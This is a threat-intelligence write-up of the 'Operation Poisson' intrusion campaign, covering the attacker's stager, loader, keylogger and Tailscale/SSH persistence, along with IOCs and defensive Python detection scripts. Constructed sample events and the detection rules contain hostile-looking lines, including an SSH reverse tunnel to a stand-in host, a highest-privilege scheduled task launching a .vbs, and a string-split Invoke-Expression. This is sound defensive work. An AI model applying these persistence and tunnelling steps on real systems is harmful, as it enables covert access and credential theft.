Overview
Between March 30 and May 1, 2026, Cato CTRL researcher Vitaly Simonovich tracked a French-speaking cybercriminal known by the handle "Poisson" through every command of a 33-day intrusion operation. The result was 339 recorded commands, four compromised victims, and a persistence mechanism that continued functioning for 18 days after the attacker's primary command-and-control (C2) server went offline.
What makes Operation Poisson stand out from the routine credential-theft campaigns that plague small businesses is not the sophistication of the attacker. Poisson is, by all available indicators, a junior operator -- likely a student learning offensive security while running live operations against real targets. What makes it notable is the specific persistence decision he made on Day 8: installing OpenSSH Server and Tailscale VPN on a victim machine to create a resilient access layer entirely independent of his C2 framework.
That single move validated what defenders have theorized for years but rarely had documented proof of: killing a C2 server is not the same as evicting an attacker. If the attacker has already built a parallel access path through a legitimate VPN mesh, the remediation accomplishes nothing.
This article examines the full operation, the attacker's tooling and techniques, the infrastructure he used, and what it means for detection and response teams.
Threat Actor Profile
Poisson is assessed as a junior, independent, financially motivated threat actor operating with a French-language context. He is not attributed to any known APT group or ransomware crew.
Handle: Poisson (French for "fish")
Secondary Handle: Stikou68
Linux Identity: avenger@ubuntu, home directory at /home/avenger/Desktop/
Language: French (installation notes, victim machines, and playbook were all in French)
Skill Level: Low-to-intermediate; failed approximately half of his attempted actions
Motivation: Financial -- targeting banking credentials, email passwords, and government portal access
Infrastructure Tier: Entirely free-tier (DuckDNS, Backblaze B2, budget IONOS VPS)
The "68" in his secondary handle is a significant detail. In France, "68" refers to the département Haut-Rhin in the Alsace region. Victim 1, a French automotive small business, operated in the same region. This detail was not deliberately disclosed by the attacker -- it was extracted from a test keystroke file he inadvertently left inside his own keylogger package, where he had typed "Stikou68!!!" repeatedly while testing the tool.
Operational Schedule: Cato CTRL observed consistent activity after 15:00 CET with a six-hour midday gap and occasional late-night sessions. This pattern is consistent with a school or academic schedule rather than a professional working day.
OPSEC Failures:
- Leaked his home directory path five times across the campaign
- Named Backblaze B2 buckets after his own handle (pois43, sentiwaw)
- Left his complete SSH playbook, victim SSH keys, and French installation notes on a publicly accessible Backblaze B2 storage bucket
- Left a self-incriminating test keystroke file inside his keylogger package
- Failed at UAC elevation dozens of times before succeeding
- Bandwidth caps on his free-tier Backblaze storage blocked his own payload downloads mid-operation for hours
Despite this, he compromised four machines, harvested credentials from real people, and built access that survived his own C2 going dark.
Targets
Poisson focused exclusively on French victims, likely due to language familiarity and geographic proximity. Cato CTRL identified the following victim profile:
- Victim 1: A French automotive small business (region: Alsace, département 68)
- Victims 2-4: French individuals, one confirmed in Val-d'Oise (département 95, near Paris)
All targets were running Windows. Victim 3, the primary target of extended operations, was confirmed to be running Windows 11 on physical hardware (ASRock B760M motherboard, Intel 12th-generation CPU) -- not a virtual machine, which is relevant because some of his sandbox evasion logic would have behaved differently in a VM.
The narrow targeting and manual credential-retrieval approach suggest this was not an automated mass campaign. Poisson was operating against a small, known-quantity victim set and retrieving the output by hand through the C2 session.
Infrastructure
Poisson built his infrastructure entirely from free-tier services:
| Component | Detail |
|---|---|
| C2 Teamserver | 217[.]154[.]217[.]139 (IONOS SE, Berlin) |
| C2 Redirector | 217[.]154[.]162[.]45 (IONOS SE, Berlin) |
| TLS Certificate CN | wawsenti[.]duckdns[.]org |
| Payload Staging Bucket 1 | pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| Payload Staging Bucket 2 | w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| Payload Staging Bucket 3 | sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| C2 Framework | Havoc (Demon agent) |
| DNS | DuckDNS (free dynamic DNS) |
The naming convention across his buckets is consistent with his handles. "Pois" is short for Poisson, "senti" appears to be derived from his malware component senti.dll, and "waw" appears to come from his DuckDNS subdomain wawsenti. The bucket sentiwaw combines both elements and was specifically used to host the SSH packages and his playbook -- the bucket that was publicly readable and exposed his entire operation.
Kill Chain: Stage by Stage
Stage 1 -- VBScript Stager (sys.vbs)
The initial stager was a 1.1 KB VBScript file encrypted with AES. Its first action upon execution was a 120-second sleep -- a simple but effective sandbox evasion technique, as many automated analysis environments time out before the payload executes. After the delay, the script decrypted an embedded PowerShell payload and executed it.
To avoid static detection on the invocation string, the script split the expression across a string concatenation: 'Invoke'+'-Expression'. This is a well-known but still functional obfuscation technique that fools basic signature matching.
SHA256: aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31
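The defender's counterpart to the two stager tricks described above (the split 'Invoke'+'-Expression' string and the 120-second sleep), as an added Python example that is not part of the Cato CTRL report: it folds adjacent string literals joined by + in script-block text so signature matching sees the cmdlet name the interpreter will actually see, and it flags fixed pre-execution delays long enough to outlast a sandbox. The sample scripts are constructed for the example and are not the campaign's actual stager.

```python
import re

# Constructed sample script-block contents for the detector to run over.
# None of these is the campaign's stager; they only mimic the two tricks
# described above (split cmdlet name, long pre-execution sleep).
SAMPLE_SCRIPTS = {
    "split_iex": "$c = 'Invoke' + '-Expression'; & $c $payload",
    "split_three_way": '$x = "Inv" + "oke-Expr" + "ession"; & $x $p',
    "plain_iex": "Invoke-Expression $payload",
    "vbs_sleep": 'WScript.Sleep 120000\r\nSet sh = CreateObject("WScript.Shell")',
    "ps_sleep": "Start-Sleep -Seconds 90; Write-Output done",
    "benign": "Get-ChildItem -Path C:\\Temp | Select-Object Name",
}

# Two string literals (same or mixed quote style, no quotes inside) joined by '+'.
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
IEX_RE = re.compile(r"invoke-expression|\biex\b", re.IGNORECASE)
# WScript.Sleep takes milliseconds; Start-Sleep defaults to seconds.
VBS_SLEEP_RE = re.compile(r"wscript\.sleep\s+(\d+)", re.IGNORECASE)
PS_SLEEP_RE = re.compile(r"start-sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.IGNORECASE)
LONG_SLEEP_SECONDS = 60  # assumed threshold; tune to the sandbox dwell time in use


def fold_string_concatenation(script: str) -> str:
    """Merge adjacent string literals joined by '+' until nothing changes.

    'Invoke' + '-Expression' becomes 'Invoke-Expression', which is what the
    interpreter evaluates and what a static rule should therefore be matched on.
    """
    previous = None
    while previous != script:
        previous = script
        script = CONCAT_RE.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", script, count=1)
    return script


def sleep_seconds(script: str) -> float:
    """Largest fixed pre-execution delay found in the script, in seconds."""
    delays = [int(ms) / 1000 for ms in VBS_SLEEP_RE.findall(script)]
    delays += [int(s) for s in PS_SLEEP_RE.findall(script)]
    return max(delays, default=0)


def flags_for(script: str) -> list[str]:
    """Return the detection labels that apply to one script-block text."""
    findings = []
    folded = fold_string_concatenation(script)
    if IEX_RE.search(folded):
        findings.append("invoke-expression")
        if not IEX_RE.search(script):
            # Only visible after folding: the name was split to dodge static matching.
            findings.append("concatenation-obfuscated")
    if sleep_seconds(script) >= LONG_SLEEP_SECONDS:
        findings.append("long-pre-execution-sleep")
    return findings


def scan_scripts(scripts: dict[str, str]) -> dict[str, list[str]]:
    """Run the rules over a name -> script mapping, keeping only scripts that fired."""
    results = {name: flags_for(text) for name, text in scripts.items()}
    return {name: found for name, found in results.items() if found}


if __name__ == "__main__":
    for name, findings in scan_scripts(SAMPLE_SCRIPTS).items():
        print(f"{name}: {', '.join(findings)}")
```

In practice the input would be the ScriptBlockText field of PowerShell Event ID 4104 or the contents of a .vbs file pulled from the staging path; folding before matching is what turns a trivially evaded string signature into one that still fires.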
Stage 2 -- Fileless Multi-Layer Loader (senti.dll)
The most technically interesting component of the campaign is senti.dll, a 3.1 MB .NET DLL that functions as a five-layer shellcode delivery vehicle with zero files written to disk.
The outer layer encodes shellcode as a sequence of 207,813 English words. Each word maps to a byte value -- for example, "manage" decodes to 0x4D and "therapist" to 0x48. This word-encoding scheme makes the payload look like a large English text corpus at a glance and bypasses tools that scan for shellcode byte patterns.
Inside the word-encoded layer is a Donut-style reflective PE loader using XOR key 0x02, which wraps the actual Havoc Demon agent payload (XOR key 0x01). The Demon agent runs entirely in memory and establishes the C2 connection back to Poisson's IONOS server.
The five-layer structure -- VBScript stager > PowerShell loader > .NET DLL > reflective loader > Demon agent -- means the actual implant never touches disk in any recognizable form.
SHA256: 3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60
Stage 3 -- UAC Elevation (Start-Process -Verb RunAs)
Once the Demon agent was running, Poisson attempted to escalate privileges using Start-Process -Verb RunAs. This is not a UAC bypass -- it is the standard Windows privilege elevation dialog. The user sees a consent prompt and must click "Yes." There is no silent exploitation here.
On Victims 1 and 2, someone clicked "Yes" quickly. On Victim 3, it took more than a dozen attempts spread across two days before the user granted consent. This is a meaningful indicator of operational noise: repeated UAC prompts on a machine are a direct detection signal that most endpoint alerting should catch.
Stage 4 -- Persistence Layer
After achieving admin privileges, Poisson deployed three overlapping persistence mechanisms:
- Scheduled Task ("TaskAdmin1"): Runs the VBScript stager at every logon with highest privileges. This is the primary re-infection vector on reboot.
- Startup Shortcut (sys.lnk): Placed in the user's Startup folder as a secondary persistence mechanism.
- Shellcode Injection into Explorer.EXE: The Demon agent shellcode was injected into the explorer.exe process, keeping the implant alive in memory without a standalone malware process visible in the process list.
Stage 5 -- Backup Remote Access (RustDesk)
Poisson deployed a custom-compiled version of RustDesk, a legitimate open-source remote desktop application, with his own relay server configuration baked in. This gave him a graphical remote access channel independent of the Havoc C2 framework.
RustDesk is significant here for two reasons. First, it is a signed, legitimate binary -- most AV and EDR products will not flag it by default. Second, it provides a graphical session in addition to the shell access through Havoc, allowing Poisson to navigate the filesystem visually, take screenshots, and browse through victim files without needing to know specific paths.
SHA256 (RustCustom.zip): c79091ceae7cd592fc08e4854cda7c1182af762b6b126371cc604debdc995fc7
Stage 6 -- Keylogger Deployment (KeyL.zip)
The credential collection mechanism was a 70-line Python script using the pynput library. It logged every keystroke to a local plaintext file on the victim machine. There was no automatic exfiltration -- no beacon, no upload server. Poisson manually retrieved the log file through his Havoc session.
He checked the keylogger output four times on a single day (April 2), confirming approximately 3,000 characters of captured keystrokes in a single active session on Victim 3. The targets were banking credentials, email passwords, and government portal logins -- the kind of credentials that give direct financial access to a small business owner.
To ensure continuous harvesting, Poisson ran powercfg /change standby-timeout-ac 300, setting the machine's sleep timeout to 300 minutes. The machine would stay awake and continue logging keystrokes around the clock.
SHA256 (KeyL.zip): 1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6
Stage 7 -- VPN Mesh Persistence (The Critical Move)
On the night of April 7, during a five-hour session, Poisson executed the most consequential action of the entire campaign.
From his sentiwaw Backblaze bucket -- the one that also contained his readable playbook -- he downloaded an SSH package. He then:
- Installed OpenSSH Server on Victim 3's machine
- Configured key-based SSH authentication using his avenger@ubuntu SSH key pair
- Installed Tailscale VPN
- Joined Victim 3's machine to his private Tailscale mesh network
- Established an SSH reverse tunnel using ssh -R
- Tested both access paths
The Tailscale mesh creates an encrypted peer-to-peer network between enrolled nodes. Once a machine is joined to the mesh, it can be reached by other enrolled devices over Tailscale's network regardless of NAT, firewalls, or public IP changes. The SSH server running on Victim 3 was reachable through Tailscale without any exposed public port.
This access path had no dependency on the Havoc C2 server. It required no separate beaconing, no C2 connectivity, and no active session. It simply waited.
Timeline
| Date | Event |
|---|---|
| March 30 | Day 1: Victim 1 compromised in 83 minutes. Scheduled task, RustDesk deployed. |
| March 31 | Persistence established on Victim 3. First UAC elevation attempts fail. |
| April 1 | 51 commands (most active day). UAC eventually succeeds on Victim 3. |
| April 2 | Keylogger deployed. Credentials harvested. powercfg keeps machine awake. |
| April 3-6 | Maintenance, brief Victim 4 connection (4 minutes, likely testing). |
| April 7 | OpenSSH Server + Tailscale installed. VPN mesh persistence established. |
| April 8 | Brief morning session, final power settings. C2 goes offline at 20:44 UTC. |
| April 8-25 | C2 dark for 18 days. Tailscale and SSH access remain active throughout. |
| April 26 | C2 returns online. All victim agents reconnect automatically. |
| April 26-30 | 145 more commands. Keylogger harvested four times in 40 minutes on April 30. |
| April 30 | certutil -scinfo run 10 times. Thales.zip accessed. Two .NET apps run. |
| April 30, 18:14 UTC | Final recorded command. 17 files deleted including Thales artifacts. |
| May 1 | C2 goes offline again. Has not returned. |
The Open Question: Thales.zip
The unresolved element of this campaign is what happened on April 30 when Poisson transferred a file called Thales.zip from a victim's Downloads folder to Victim 3's machine.
He extracted a .NET application called WinFormsApp1.exe and ran it for 21 unattended minutes. He then ran a second file he had pre-staged in his own Backblaze bucket -- Thal.exe, a 148 MB self-contained executable bundled with the full .NET 8.0 runtime -- for another 11 minutes.
The naming is notable. Thales is a major French defense and technology company. Whether the file was something Poisson obtained, something belonging to a victim, or something else entirely is unknown. After both executions completed, Poisson spent four minutes deleting 17 files including all Thales-related artifacts.
The combination of prior certutil -scinfo smart card enumeration and the execution of an unknown application labeled with a defense contractor name -- followed by careful cleanup -- is the part of this campaign that remains unexplained.
SHA256 (Thal.exe): 0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe
Attribution and Context
Poisson is not attributed to a known APT group. The free-tier infrastructure, inconsistent operational tempo, high failure rate, and French language indicators all point to an individual operator without organizational backing.
The assessment of "junior" should not, however, be read as "harmless." Poisson succeeded. He compromised real machines, stole credentials from real people at a real business, and his access outlived his C2 being taken down. The lower bar for entry into offensive operations -- driven by openly available frameworks like Havoc, legitimate remote access tools like RustDesk and Tailscale, and free hosting infrastructure -- means that what once required significant technical skill can now be executed, imperfectly but effectively, by someone still learning.
Relevant History: Tailscale, RustDesk, and Legitimate Tool Abuse
Operation Poisson is not the first campaign to weaponize Tailscale. The technique of using legitimate VPN mesh software as a persistence and access layer has precedent at the highest levels of the threat landscape.
APT31 (China-nexus) used Tailscale to tunnel network traffic out of compromised Russian IT firms throughout 2024 and into 2025. In those operations, Tailscale served as an encrypted egress channel that blended with legitimate corporate VPN traffic.
Scattered Spider, the social engineering-focused group responsible for high-profile breaches including MGM Resorts and Caesars Entertainment, has used legitimate remote access tools including Ngrok and Fleetdeck as persistence mechanisms and access channels. The pattern of using signed, commercially available software to maintain access is consistent with Poisson's approach.
Akira Ransomware operators have been observed deploying RustDesk as a backup remote access channel in recent intrusion campaigns, mirroring Poisson's use of a custom-compiled RustDesk as a secondary C2 path.
The thread connecting these examples is the same principle Poisson applied: signed, legitimate binaries do not trip file-based detection. Detection that focuses on file reputation and hash matching fails to catch these tools because the tools themselves are not malicious -- only their deployment context is. Behavioral detection, not file scanning, is the required response.
This is also not the first time Havoc has been used as a C2 framework in targeted intrusions. Since its public release, Havoc has appeared in campaigns attributed to multiple threat actors across different geographies and motivations, largely because it is capable, open-source, and generates C2 traffic that can be configured to blend with legitimate HTTPS.
Detection Guidance
Process-Level Detections (Windows EDR)
OpenSSH Server Installation on Workstations
OpenSSH Server installation on a Windows workstation is rarely legitimate. The Windows Optional Feature OpenSSH.Server~~~~0.0.1.0 has a clear install event that should generate an alert on any non-server machine.
Relevant process indicators:
- Add-WindowsCapability with parameter OpenSSH.Server
- sc.exe creating or starting service sshd
- sshd.exe running on a workstation-class host
Tailscale Installation
tailscale.exe or tailscaled.exe appearing on machines that do not have an approved VPN inventory entry should generate an immediate alert. Watch for:
- Tailscale installer execution
- Service creation for Tailscale
- Network connections from tailscaled.exe to Tailscale's relay infrastructure (controlplane.tailscale.com, *.tailscale.io)
- DNS queries to Tailscale coordination infrastructure from non-approved hosts
SSH Reverse Tunnel Establishment
The command ssh -R (remote port forwarding) from an endpoint to an external host is anomalous in virtually any enterprise environment. Process creation events showing ssh.exe with -R arguments should alert immediately.
Scheduled Task with Highest Privileges Running Script Interpreters
The scheduled task TaskAdmin1 is campaign-specific, but the behavioral pattern is generic: a scheduled task configured with -RunLevel Highest (or the equivalent XML <RunLevel>HighestAvailable</RunLevel>) that executes wscript.exe, powershell.exe, cmd.exe, or similar interpreters should be flagged on any workstation.
powercfg Standby Timeout Modification
powercfg /change standby-timeout-ac is not a malicious command on its own, but it is a known component of attacker persistence workflows where the attacker needs a machine to remain awake for ongoing credential harvesting or C2 beaconing. Alert on this command being run from unusual parent processes or in conjunction with other suspicious activity.
wscript.exe Executing .vbs from User-Writable Directories
Poisson staged his VBScript stager in user-accessible paths. wscript.exe executing .vbs files from %APPDATA%, %TEMP%, %USERPROFILE%, or \Downloads\ should generate an alert.
Shellcode Injection into Explorer.exe
Process injection into explorer.exe from an unexpected parent process is a high-fidelity detection signal. Sysmon Event ID 8 (CreateRemoteThread) targeting explorer.exe from a non-system process is worth alerting on.
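The process-level rules above, expressed as one rule set run over Sysmon-style events, as an added Python example that is not part of the Cato CTRL report. Field names EventID, Computer, Image, CommandLine, SourceImage and TargetImage follow Sysmon; HostRole is an assumed enrichment field that a SIEM would add from asset inventory, and APPROVED_TAILSCALE_HOSTS is a constructed allow-list. The sample events are constructed to exercise each rule and are not telemetry from the campaign.

```python
import ntpath
import re
import shlex

# Constructed approval inventory: hosts on which Tailscale is sanctioned.
APPROVED_TAILSCALE_HOSTS = {"it-admin-01"}

INTERPRETERS = ("wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads)\\", re.IGNORECASE)
HIGHEST_RUNLEVEL = re.compile(
    r"/rl\s+highest|-runlevel\s+highest|<runlevel>highestavailable</runlevel>", re.IGNORECASE)
SSHD_SERVICE_OP = re.compile(r"\b(create|start|config)\s+sshd\b", re.IGNORECASE)
SEVERITY = {"powercfg-standby-timeout": "review"}  # everything else defaults to "alert"

# Constructed Sysmon-style events: EventID 1 = process creation, 8 = CreateRemoteThread.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "sales-laptop-07", "HostRole": "workstation",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"},
    {"EventID": 1, "Computer": "sales-laptop-07", "HostRole": "workstation",
     "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -N -R 2222:127.0.0.1:22 operator@relay.invalid"},
    {"EventID": 1, "Computer": "sales-laptop-07", "HostRole": "workstation",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /Create /TN TaskAdmin1 /SC ONLOGON /RL HIGHEST /TR "wscript.exe C:\Users\alice\AppData\Roaming\sys.vbs"'},
    {"EventID": 1, "Computer": "sales-laptop-07", "HostRole": "workstation",
     "Image": r"C:\Windows\System32\powercfg.exe",
     "CommandLine": "powercfg /change standby-timeout-ac 300"},
    {"EventID": 1, "Computer": "sales-laptop-07", "HostRole": "workstation",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\AppData\Roaming\sys.vbs"'},
    {"EventID": 8, "Computer": "sales-laptop-07", "HostRole": "workstation",
     "SourceImage": r"C:\Users\alice\AppData\Local\Temp\loader.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Computer": "sales-laptop-07", "HostRole": "workstation",
     "Image": r"C:\Program Files\Tailscale\tailscaled.exe",
     "CommandLine": r'"C:\Program Files\Tailscale\tailscaled.exe"'},
    {"EventID": 1, "Computer": "it-admin-01", "HostRole": "workstation",
     "Image": r"C:\Program Files\Tailscale\tailscaled.exe",
     "CommandLine": r'"C:\Program Files\Tailscale\tailscaled.exe"'},
    {"EventID": 1, "Computer": "sales-laptop-07", "HostRole": "workstation",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
]


def basename(path):
    return ntpath.basename(path or "").lower()


def argv(cmdline):
    """Windows-style tokenisation (quotes kept, backslashes literal)."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:
        return cmdline.split()


def evaluate(ev):
    """Return the names of every rule that fires on one event."""
    hits = []
    if ev.get("EventID") == 8:
        # Remote thread into explorer.exe from anything outside the Windows directory.
        source = (ev.get("SourceImage") or "").lower()
        if basename(ev.get("TargetImage")) == "explorer.exe" and not source.startswith("c:\\windows\\"):
            hits.append("remote-thread-into-explorer")
        return hits

    img = basename(ev.get("Image"))
    cmd = ev.get("CommandLine") or ""
    low = cmd.lower()
    if ev.get("HostRole", "workstation") == "workstation" and (
            img == "sshd.exe"
            or ("add-windowscapability" in low and "openssh.server" in low)
            or (img == "sc.exe" and SSHD_SERVICE_OP.search(low))):
        hits.append("openssh-server-on-workstation")
    if ev.get("Computer") not in APPROVED_TAILSCALE_HOSTS and (
            img.startswith("tailscale") or (img == "sc.exe" and "tailscale" in low)):
        hits.append("unapproved-tailscale")
    if img == "ssh.exe" and "-R" in argv(cmd):
        hits.append("ssh-reverse-tunnel")
    if HIGHEST_RUNLEVEL.search(low) and any(i in low for i in INTERPRETERS):
        hits.append("privileged-task-runs-interpreter")
    if img == "powercfg.exe" and "standby-timeout-ac" in low:
        hits.append("powercfg-standby-timeout")
    if img in ("wscript.exe", "cscript.exe") and ".vbs" in low and USER_WRITABLE.search(low):
        hits.append("vbs-from-user-writable-path")
    return hits


def scan(events):
    """(host, rule, severity) for every rule hit across a batch of events."""
    return [(ev.get("Computer"), rule, SEVERITY.get(rule, "alert"))
            for ev in events for rule in evaluate(ev)]


if __name__ == "__main__":
    for host, rule, severity in scan(SAMPLE_EVENTS):
        print(f"{severity:6} {host}: {rule}")
```

The rules are deliberately independent so that one event can carry several labels; the one that is only "review" severity (powercfg) becomes interesting when the same host also carries any of the others, which is the correlation the guidance above asks for.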
Network-Level Detections
DuckDNS Subdomains
Block or alert on DNS resolution of *.duckdns.org at the corporate DNS resolver or proxy layer. While DuckDNS is a legitimate service, it appears consistently in threat actor infrastructure because of its free and anonymous registration model. Most enterprises have no legitimate business reason to resolve DuckDNS subdomains.
Tailscale Coordination Traffic from Unauthorized Hosts
If Tailscale is not an approved enterprise tool, DNS queries to controlplane.tailscale.com or HTTPS connections to *.tailscale.io from endpoint IPs should alert.
Backblaze B2 Object Storage Traffic
Connections to *.backblazeb2.com from endpoints outside of approved application inventory should be reviewed. Backblaze B2 was used by Poisson for all payload staging and is an increasingly common choice for threat actors due to low cost and CDN-grade delivery.
Havoc C2 Beacon Patterns
Havoc Demon agent traffic uses configurable HTTP/HTTPS profiles but has known default patterns. Network detection signatures for Havoc C2 traffic are available in public threat intelligence feeds.
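The network-level rules above as one matcher over DNS, proxy and firewall lines, added here as a Python example that is not part of the Cato CTRL report. It refangs the published `[.]` indicators at runtime for exact matching and adds the generic suffix rules (DuckDNS, Tailscale coordination, Backblaze B2) so it also catches infrastructure this campaign did not use. The log line format and the APPROVED_TAILSCALE_SOURCES allow-list are constructed for the example; the first IPv4 token on each line is taken as the internal source.

```python
import re

# Network indicators from the report, kept in the defanged form they are published in.
CAMPAIGN_IOCS_DEFANGED = [
    "217[.]154[.]217[.]139",
    "217[.]154[.]162[.]45",
    "wawsenti[.]duckdns[.]org",
    "pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com",
    "w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com",
    "sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com",
]


def refang(indicator: str) -> str:
    """Turn a published '[.]'-defanged indicator back into a matchable value."""
    return indicator.replace("[.]", ".").strip().lower()


CAMPAIGN_IOCS = {refang(i) for i in CAMPAIGN_IOCS_DEFANGED}

# Generic service-level rules: any destination under these suffixes is of interest.
SUFFIX_RULES = {
    "duckdns-dynamic-dns": ("duckdns.org",),
    "tailscale-coordination": ("controlplane.tailscale.com", "tailscale.io"),
    "backblaze-b2-storage": ("backblazeb2.com",),
}
# Constructed: internal sources where Tailscale is sanctioned, so its traffic is expected.
APPROVED_TAILSCALE_SOURCES = {"10.0.0.5"}

# Either a dotted IPv4 address or a hostname whose last label is alphabetic.
TOKEN_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}|[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")

# Constructed log lines in a simplified "<timestamp> <source> <verb> <destination>" shape.
SAMPLE_LOG = [
    "2026-04-07T21:12:03Z 10.0.0.23 query A wawsenti.duckdns.org",
    "2026-04-07T21:13:44Z 10.0.0.23 CONNECT pois43.s3.eu-central-003.backblazeb2.com:443",
    "2026-04-07T21:40:10Z 10.0.0.23 query A controlplane.tailscale.com",
    "2026-04-07T21:40:12Z 10.0.0.5 query A controlplane.tailscale.com",
    "2026-04-08T20:40:00Z 10.0.0.23 -> 217.154.217.139:443 TCP",
    "2026-04-08T09:15:31Z 10.0.0.41 query A www.example.com",
]


def classify(value: str, source: str = "") -> list[str]:
    """Labels for one destination host or IP; an empty list means nothing of interest."""
    value = value.lower().rstrip(".")
    labels = []
    if value in CAMPAIGN_IOCS:
        labels.append("campaign-ioc")
    for label, suffixes in SUFFIX_RULES.items():
        if label == "tailscale-coordination" and source in APPROVED_TAILSCALE_SOURCES:
            continue  # sanctioned Tailscale host: coordination traffic is expected
        if any(value == s or value.endswith("." + s) for s in suffixes):
            labels.append(label)
    return labels


def scan_line(line: str) -> dict:
    """First IPv4 token is the internal source; every later host/IP token is a destination."""
    tokens = TOKEN_RE.findall(line)
    source = tokens[0] if tokens else ""
    hits = []
    for token in tokens[1:]:
        labels = classify(token, source)
        if labels:
            hits.append({"destination": token, "labels": labels})
    return {"source": source, "hits": hits}


def scan(lines):
    """Only the lines that produced at least one hit."""
    return [result for result in (scan_line(line) for line in lines) if result["hits"]]


if __name__ == "__main__":
    for result in scan(SAMPLE_LOG):
        for hit in result["hits"]:
            print(f"{result['source']} -> {hit['destination']}: {', '.join(hit['labels'])}")
```

Exact indicator matches age quickly (the teamserver went dark twice in this campaign alone); the suffix rules are the part worth keeping in a resolver or proxy policy long after these specific hosts stop mattering.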
Indicators of Compromise
Network
| Type | Indicator |
|---|---|
| C2 Teamserver | 217[.]154[.]217[.]139 |
| C2 Redirector | 217[.]154[.]162[.]45 |
| DuckDNS Domain | wawsenti[.]duckdns[.]org |
| Payload Staging | pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| Payload Staging | w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com |
| Payload Staging | sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com |
File Hashes (SHA256)
| File | SHA256 |
|---|---|
| sys.vbs | aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31 |
| senti.dll | 3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60 |
| RustCustom.zip | c79091ceae7cd592fc08e4854cda7c1182af762b6b126371cc604debdc995fc7 |
| SSH.zip | f06e7e1a4363a01ba2a4fee2e28abdd623abf4194bda373f23ff0e151b5c2b45 |
| KeyL.zip | 1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6 |
| RevS.ps1 | 291cb1fd0f2709b4457447cbb87adacf5c36c1bcb0f8754524024d44174bb195 |
| Thal.exe | 0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe |
Host
| Type | Value |
|---|---|
| Scheduled Task | TaskAdmin1 (highest privileges, runs at logon) |
| Service | sshd (configured auto-start) |
| Service | Tailscale |
| Firewall Rules | RustDesk Full Access, RustDesk Full Access OUT, SSH |
| Operator SSH Key | ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIUZH+MrtQKX4Cy68ldwV+1KKpOKU/xrdnucyG5eKZAR avenger@ubuntu |
MITRE ATT&CK Mapping
| Technique ID | Technique Name | Usage |
|---|---|---|
| T1059.001 | Command and Scripting Interpreter: PowerShell | PowerShell loader chain |
| T1059.005 | Command and Scripting Interpreter: VBScript | sys.vbs initial stager |
| T1027 | Obfuscated Files or Information | Word-encoding, XOR layers, AES encryption in stager |
| T1055.001 | Process Injection: Dynamic-link Library Injection | Shellcode injection into explorer.exe |
| T1053.005 | Scheduled Task/Job: Scheduled Task | TaskAdmin1 persistence |
| T1547.001 | Boot or Logon Autostart Execution: Startup Folder | sys.lnk in Startup folder |
| T1219 | Remote Access Software | RustDesk custom build, OpenSSH Server |
| T1572 | Protocol Tunneling | SSH reverse tunnel via Tailscale mesh |
| T1021.004 | Remote Services: SSH | OpenSSH access through Tailscale |
| T1056.001 | Input Capture: Keylogging | 70-line Python keylogger via pynput |
| T1529 | System Shutdown/Reboot (anti-remediation via persistence) | Scheduled tasks, SSH survive reboot |
| T1562.001 | Impair Defenses: Disable or Modify Tools | powercfg standby modification |
Key Takeaways
C2 takedown is not remediation. The defining lesson from Operation Poisson is documented proof that an attacker can build a parallel access layer that survives losing their primary C2. In this case, the access survived an 18-day outage and was still fully functional when the C2 came back online. Remediation teams must now actively hunt for secondary persistence mechanisms beyond the C2 they identified.
Legitimate tools are the evasion strategy. Poisson used no zero-days, no novel exploit techniques, and no custom implants with sophisticated anti-analysis capabilities (beyond the word-encoding loader). His access survived because Tailscale is signed, legitimate software that most organizations have no detection for. The same is true of OpenSSH Server and RustDesk. Detection that depends on file reputation cannot catch these.
The skill floor is lower than it looks. Poisson failed at roughly half of what he attempted. His OPSEC was poor enough that a public storage bucket exposed his entire playbook. And he still compromised four machines and harvested real credentials. As AI tooling and open-source offensive frameworks continue to lower the barrier to entry, the volume of Poisson-class operators will grow even as the individual skill level stays low.
The Thales question remains open. The execution of two unknown .NET applications under a name associated with a major defense contractor, followed by methodical evidence deletion, is the element of this campaign that deserves continued attention if either Thal.exe or WinFormsApp1.exe resurfaces in future investigations.
References
- Simonovich, V. (2026, June 16). Cato CTRL Threat Research: Operation Poisson -- Analyzing a Cybercriminal's Entire Operation. Cato Networks. https://www.catonetworks.com/blog/cato-ctrl-operation-poisson-analyzing-a-cybercriminals-entire-operation/
